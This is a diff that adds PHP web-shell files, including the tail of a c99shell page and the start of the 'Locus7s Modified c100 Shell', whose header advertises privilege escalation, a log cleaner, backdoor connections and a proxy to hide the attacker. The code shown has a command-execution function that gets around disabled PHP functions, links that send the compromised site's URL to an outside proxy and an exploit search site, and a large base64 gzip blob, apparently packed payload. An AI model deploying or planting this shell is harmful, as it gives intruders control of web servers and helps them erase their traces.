?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> PSych0  | <a href=""><font color="#FF0000">Cuz N0wH?R? iS s?cu? ?enough</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> 
+</body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/php/c99_locus7s.php b/php/c99_locus7s.php
new file mode 100644
index 0000000..cb3fe60
--- /dev/null
+++ b/php/c99_locus7s.php
@@ -0,0 +1,3595 @@
+<?php
+
+/******************************************************************************************
+*  Locus7s Modified c100 Shell                                                                 
+*  Beta v. 1.0a - Project x2300                                                                   
+*  Written by Captain Crunch Team                                                          
+*  Modified by Shadow & Preddy                                                              
+*  Re-Modified by #!physx^ (15.2.07)                                                          
+*========================================================
+*  New Modifications Implemented --                                                      
++--------------------------------------------------------+
+*  -Added link to Enumerate to escalate priviledges      
+*  -Added Rootshell.c                                     
+*  -Added Rootshell.c;auto-compiler                      
+*  -Execute Rootshell.c                                  
+*  -Added Mig-Log Logcleaner                             
+*  -Execute Mig-Log Logcleaner                           
+*  -milw0rm searcher (Grabs OS and searches milw0rm)    
+*  -Locus7s Style & Image                                
+*  -Added w4ck1ng Shell Backdoor Connect and Backdoor    
+*  -Added PHP-Proxy link to hide your ass                
+*  -Added your ip and server ip with whois capability    
+*  -Added private 0day released by allahaka which utilizes the linux
+*   sudo bash to execute a stack overflow.
+*========================================================
+*  FEB. 14, 2007 RELEASE NOTES:                          
++--------------------------------------------------------+
+*  PRIVATE RELEASE OF C100 SHELL FOR LOCUS7S MEMBERS     
+*  FAILURE TO DO SO WILL RESULT IN LOSS OF VIP           
+*  MEMBERS ACCESS, BAN FROM SITE, AND NO REFUND FOR VIP. 
+*========================================================
+*  PRODUCT INFO:                                         
++--------------------------------------------------------+
+*  C100 SHELL CREATED BY CAPTAIN CRUNCH SECURITY TEAM    
+*  WWW.CCTEAM.RU                                         
+*  C100 SHELL - REVAMPED (X2300) MODIFIED BY LOCUS7S     
+*  UNDERGROUND NETWORK | WWW.LOCUS7S.COM                 
+*  \E0T/                                                 
+*********************************************************/
+
+//for php proxy purposes
+
+function selfURL() { $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]); return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; } function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); }
+$selfurl = base64_encode(selfURL());
+$phprox="http://twofaced.org/proxy/index.php?q=".$selfurl;
+
+//end of link
+
+//milw0rm search
+$Lversion = php_uname(r);
+$OSV = php_uname(s);
+if(eregi("Linux",$OSV))
+{
+$Lversion=substr($Lversion,0,6);
+$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+}else{
+$Lversion=substr($Lversion,0,3);
+$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+//End of milw0rm search
+
+
+//w4ck1ng Shell
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+$proxy_shit="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